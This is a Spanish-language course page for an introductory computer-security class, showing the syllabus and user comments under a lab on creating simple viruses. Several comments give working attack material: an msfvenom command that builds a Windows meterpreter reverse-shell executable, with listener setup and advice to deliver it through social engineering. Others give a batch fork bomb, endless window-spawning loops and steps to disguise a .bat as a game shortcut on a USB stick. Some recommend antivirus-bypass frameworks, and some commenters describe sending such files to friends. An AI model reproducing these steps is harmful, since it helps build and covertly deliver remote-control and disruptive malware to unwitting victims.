Introducción a la Seguridad Informática

1

Qué aprenderás sobre seguridad informática

2

Objetivo Seguridad Informática

3

Principios fundamentales de la Información

4

Términos relacionados con la Seguridad Informática

Principios básicos en la Seguridad Informática

5

Los 5 principios clave de la seguridad informática

6

Cómo instalar VirtualBox

7

Cómo instalar VMWARE

8

Laboratorio: Importación y Montaje de la Máquina Virtual en VirtualBox desde cero

9

Laboratorio: Importación y Montaje de la Máquina Virtual con VMWare

10

Laboratorio: Creación de usuarios en Windows aplicando el principio del menor privilegio

11

Laboratorio: Creación de usuarios en Linux aplicando el principio de menor privilegio

Seguridad en Redes TCP/IP

12

Modelo TCP/IP

13

Introducción a la seguridad en redes TCP/IP

14

Modelo OSI simplificado

15

Seguridad por debajo de la capa 3

16

Laboratorio: Realizar un escaneo de puertos

17

Laboratorio: Realizar análisis de protocolos con la herramienta Wireshark

Dispositivos de Seguridad Informática

18

Dispositivos de seguridad informática: Firewalls - Honeypot - Antivirus - Anti-Spam - VPN’s - IPS

19

Implementación del Honeypot Dionaea

Hackers y Fases de un Hacking

20

¿Qué es un Hacker? Clases de Hacker

21

Cómo instalar FOCA

22

Qué es Hacking y fases del Hacking

23

Laboratorio: analizando metadatos usando la herramienta FOCA

24

Laboratorio: Obtener todos los Datos disponibles de algunos Sitios Web con WHOIS

25

Laboratorio: Realizar Email tracking

Manejo de Incidentes de Seguridad

26

Manejo de incidentes de seguridad ¿Qué es un incidente de seguridad? Administración de incidentes de seguridad

27

Recomendaciones para la atención y manejo de incidentes de seguridad

Introducción al Malware

28

¿Qué es malware? Tipos de malware

29

Laboratorio: Creación de virus sencillos utilizando la consola de comandos

Ingeniería Social

30

Ingeniería Social: Conceptos generales. Fases de un ataque de ingeniería social. Tipos de ataques y contramedidas

Estándares Internacionales de Seguridad

31

Estándares Internacionales de Seguridad: COBIT, ITIL, OWASP, CIS, NIST, ISO27001

32

Reto: análisis de las Políticas de Seguridad Informática de organizaciones reconocidas para identificar los componentes de seguridad de los estándares internacionales

Conclusiones

33

Conclusiones y cierre del curso

Bonus

34

¿Qué es un firewall?

Aún no tienes acceso a esta clase

Crea una cuenta y continúa viendo este curso

Laboratorio: Creación de virus sencillos utilizando la consola de comandos

29/34
Recursos

Aportes 47

Preguntas 4

Ordenar por:

¿Quieres ver más aportes, preguntas y respuestas de la comunidad? Crea una cuenta o inicia sesión.

Hola, mencionar también que para crear un malware desde la distro de Linux, Kali Linux, pueden seguir los siguientes pasos:

Desde la consola escribir

msfvenom -p windows/meterpreter/reverse_tcp LHOST=(LaIpDelHost) LPORT=(ElNúmeroDelPuerto) -f > exe (NombreDelMalware).exe

¿Qué estamos haciendo?
Bien, primero estamos usando la herramienta msfvenom, la cual nos sirve para crear payloads, el -p es para asignar que paylodad usaremos, en este caso se usara el payload “windows/meterpreter/reverse_tcp” esto significa que tendremos una sesión de meterpreter para controlar al equipo infectado a través de un protocolo tcp reverso, luego estamos asignado el LHOST, es decir, la ip del equipo desde la cual controlaremos al equipo infectado, luego el LPORT que por defecto se usa el 4444, luego le asignamos el formato y le decimos que será un .exe y le damos un nombre, y así nos generará el malware, ya queda usar algo de ingeniería social para hacer que este malware entre al equipo que queremos infectar. (Cabe resaltar que este tipo de malware ya es detectado por muchos antivirus, es solo como guía para que vean como se pueden crear malware un poco más “avanzados”.

Luego de esto, necesitamos tener en escucha nuestra consola para poder conectarnos remotamente al equipo infectado, para poder poner nuestra consola en escucha, usaremos:

Primero escribimos:

msfconsole

Una vez que se abra msfconsole escribimos los siguientes comandos:

use multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST (LaIpDelHost)
set LPORT (ElNúmeroDelPuerto)

una vez configurado escribiremos:

exploit o run

le damos a enter y ya estará escuchando.

(Este método funciona en redes lan donde ambos dispositivos, el atacante y el atacado están en la misma red, puede ser en redes externas a la privada pero en ese caso se tendría que abrir el puerto a usar en la configuración del router y usar la ip publica de nuestra máquina no la privada.)
Úsenlo para fines éticos.

Otra forma de hacer un bucle abriendo las aplicaciones es esta
sin tener que copiar varias veces
@echo off
:e
start cmd. exe
start calc.exe
goto e

Esto no es nada pero lo es todo para mi 💜

Venga ya…
¡Tremendo curso, no me arrepiento de tomarlo! 😄

Yo creo que muchos hicimos esa broma y conocíamos esto jajaj llenar un bloc de notas de miles de Start y apenas lo habrán una lluvia de ventanas jajaja tenia un amigo que hacia que se iniciaran paginas digamos, no aptas para menores de edad jajajajajaaj

Incluso el engaño se puede disimular mejor todavía de la siguiente manera, se crea una carpeta dentro del usb con cualquier nombre, en este caso yo le puse ‘DATA’ , dentro de esa carpeta se pone el archivo .bat original y un archivo de imagen del tipo .ico … Luego hacemos un acceso directo del .bat al archivo raíz del usb, y le cambiamos el nombre a “juego mario” o lo que sea. Una vez creado el acceso directo nos vamos a propiedades > change icon > browse , navegamos hasta la carpeta ‘DATA’ del usb y seleccionamos el archivo .ico para cambiar la imagen del shortcut, luego aplicar.

La NASA quiere saber su ubicación !!!

start calc.exe
start notepad.exe
start cmd.exe

usteded considera realmente ese archivo .bat como virus? Que bajo nivel

En la secundaria hacía bat’s con bromas similares, les cambiaba el icono para que pareciera que era Word o Internet Explorer y al abrir, PUM! Empezaba a mandar alertas con mensajes de broma para espantar a los demás.

Los .BAT, son muy comunes que se bloqueen por cualquier antivirus, o hasta el mismo software de correo.

buen ejemplo, tambien se puede poner a que se ejecute solito sin esperar el clic del usuario con un autorun (windows)

para que tanto start si tan solo necesitas que se habra google chrome

Incluso de puede hacer una Bomba Fork que es aun mas peligroso, podrían crear un archivo en bloc de notas y escribir %0|%0, lo guardan como .bat y cuando lo abren, básicamente te deja congelada la computadora y no podrás hacer nada, poco a poco se empezara a alentar y en algunas ocasiones ni siquiera te dejara apagarla. Si se llega a probar este Script pueden hacerlo en una maquina virtual para que no dañen su computadora principal, es preferible virtualizar e intentarlo, no importa que versión de Windows sea, en todas las versiones cuelga a Windows.

Me logro sacar una buena risa, muy divertido

dammmmm que cool jajaja increible

algún ejemplo de crear estos bat para el sistema operativo linux?

En una ocacion hice uno en C++ donde llenaba el disco duro con basura

Me acuerdo cuando en primaria me ponia a ‘programar’ en bat. Algo que hacia era poner el comando ‘shutdown’ con un timer y un mensaje de ‘te hackea muajaja’. Era divertido dejarlos en mi labratoria de computo haha

Si quieren generar payloads que hagan bypass del antivirus, les recomiendo utilizar:

Veil Framkework
https://github.com/Veil-Framework/Veil

Empire
https://github.com/EmpireProject/Empire

Gracias por los laboratorios

Este script no sería un virus ya que carece de facilidades para autoreplicarse.

Muy interesante , lo pasare a otros…

Buena práctica. Implementarlo en VB fue genial. Saludos

Que simple hacer un virus jajaja quien lo diría

un ejemplo muy simple

super e interesante esta creación de virus…

muy muy simple el virus lo que difícil de pasar por Internet,

Molestare a mis amigos con ese virus =) ja gracias y aprender =)

super

(Y)

Interesante, por allí lo envié para jugar un abroma a un par de amigos veremos que pasa.

Muy sencillo crear este tipo de virus.

.

si voy a hacerlo con mis amigos con un aviso al principio donde diga que me deben una cerveza por reparar su computadora. jajajajaja!!!

buen aporte

La maquina virtual de windows no me reconoce el pendrive. que sera?

Esto funciona así por que está usando la terminal de windows verdad? Por ejemplo quiero hacer algo para algún sistema basado en unix, tengo que usar el lenguaje del shell no? por que en esos sistemas el shell mismo tiene su propio lenguaje de programación.

ejejej Esta interesante

Para generar payloads que hagan un excelente bypass del antivirus, les recomiendo:
Veil Framework
https://github.com/Veil-Framework/Veil

Empire
https://github.com/EmpireProject/Empire

Alguien tiene mas información como esta? es interesante.

Recuerdo en uno de los laboratorios de mis primeros cursos de programación en la universidad, tratando de hacer una calculadora con punteros, en varias ocasiones me saltaba el antivirus con una alerta donde decía “se ha detectado un gusano…”.

Que lindo que es el mundo de la programación jejeje.🤣

Hacer estas cosas tan simples y que pueden ser tan molestas es algo divertido, no me quiero ni imaginar lo que debe ser hacer un malware que realmente genere un daño significativo.

Profesor hice el .bar en la laptop de mi mama y ahora ya no enciende 😦

Que clase tan interesante, la verdad con algo tan sencillo se puede hacer tantas cosas.
Me encanta mucho este concepto de curso en el cual tienes laboratorios en donde puedes realizar este tipo de pruebas.

Dejo un poquito un código un poquito más elaborado en VBasic, que se podría renombrar o esconder dentro de una aplicación o fotografía.

<do
msgbox "Este es un virus"
Set WshShell = CreateObject("WScript.Shell")
WshShell.Run chr(34) & "SP26" & Chr(34), 0
Set WshShell = Nothing
loop>

Muy Divertido este laboratorio.
Btcrt